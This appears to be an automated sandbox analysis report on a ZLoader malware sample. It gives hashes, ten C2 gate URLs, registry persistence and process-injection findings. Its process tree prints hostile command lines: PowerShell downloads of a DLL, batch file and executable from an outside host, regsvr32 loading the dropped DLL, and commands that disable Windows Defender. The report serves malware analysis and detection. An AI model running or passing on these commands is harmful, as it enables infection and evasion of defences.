Analysis
Max time kernel: 78s
Max time network: 154s
Platform: windows10_x64
Resource: win10v20210408
Submitted: 16-08-2021 17:59
Static task: static1
Behavioral task: behavioral1
Sample: 8f87fe90d589a4fa73cff6a242fe222b.exe
Resource: win7v20210410
General
Target: 8f87fe90d589a4fa73cff6a242fe222b.exe
Size: 165KB
MD5: 8f87fe90d589a4fa73cff6a242fe222b
SHA1: 381e33872d0f6f1a7233beeb6e9524435c2a9ab6
SHA256: edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
SHA512: f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0
Malware Config
Extracted family: zloader
Botnet: ivan
Campaign: ivan
C2 URLs:
  https://iqowijsdakm.com/gate.php
  https://wiewjdmkfjn.com/gate.php
  https://dksaoidiakjd.com/gate.php
  https://iweuiqjdakjd.com/gate.php
  https://yuidskadjna.com/gate.php
  https://olksmadnbdj.com/gate.php
  https://odsakmdfnbs.com/gate.php
  https://odsakjmdnhsaj.com/gate.php
  https://odjdnhsaj.com/gate.php
  https://odoishsaj.com/gate.php
Signatures

Blocklisted process makes network request (1 IoC)
Processes (flow / PID / process):
  flow 8, PID 4000, powershell.exe

Downloads MZ/PE file

Loads dropped DLL (1 IoC)
Processes (PID / process):
  PID 2680, regsvr32.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes (description / IoC / process):
  Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce (8f87fe90d589a4fa73cff6a242fe222b.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" (8f87fe90d589a4fa73cff6a242fe222b.exe)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes (PID / process):
  PID 4000, powershell.exe
  PID 4000, powershell.exe
  PID 4000, powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description / PID / process):
  Token: SeDebugPrivilege, PID 4000, powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
Processes (description / PID / process / target process):
  PID 636 wrote to memory of 2696: 8f87fe90d589a4fa73cff6a242fe222b.exe -> cmd.exe
  PID 636 wrote to memory of 2696: 8f87fe90d589a4fa73cff6a242fe222b.exe -> cmd.exe
  PID 2696 wrote to memory of 4000: cmd.exe -> powershell.exe
  PID 2696 wrote to memory of 4000: cmd.exe -> powershell.exe
  PID 2696 wrote to memory of 3788: cmd.exe -> regsvr32.exe
  PID 2696 wrote to memory of 3788: cmd.exe -> regsvr32.exe
  PID 3788 wrote to memory of 2680: regsvr32.exe -> regsvr32.exe
  PID 3788 wrote to memory of 2680: regsvr32.exe -> regsvr32.exe
  PID 3788 wrote to memory of 2680: regsvr32.exe -> regsvr32.exe
Processes (process tree; indentation and level number show parent/child depth)

level 1: C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"
   PID: 636
   - Adds Run key to start application
   - Suspicious use of WriteProcessMemory

  level 2: C:\Windows\SYSTEM32\cmd.exe
     Command line: cmd /c start.bat
     PID: 2696
     - Suspicious use of WriteProcessMemory

    level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       Command line: powershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll
       PID: 4000
       - Blocklisted process makes network request
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken

    level 3: C:\Windows\system32\regsvr32.exe
       Command line: regsvr32 JavaP.dll
       PID: 3788
       - Suspicious use of WriteProcessMemory

      level 4: C:\Windows\SysWOW64\regsvr32.exe
         Command line: JavaP.dll
         PID: 2680
         - Loads dropped DLL

        level 5: C:\Windows\SysWOW64\msiexec.exe
           Command line: msiexec.exe
           PID: 1252

    level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       Command line: powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
       PID: 3988

    level 3: C:\Windows\system32\cmd.exe
       Command line: cmd /c nsudo.bat
       PID: 696

      level 4: C:\Windows\system32\cacls.exe
         Command line: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
         PID: 4036

      level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
         PID: 3520

      level 4: C:\Users\Admin\AppData\Roaming\javase.exe
         Command line: javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
         PID: 2128

      level 4: C:\Users\Admin\AppData\Roaming\javase.exe
         Command line: javase -U:T sc config WinDefend start= disabled
         PID: 3880
Downloads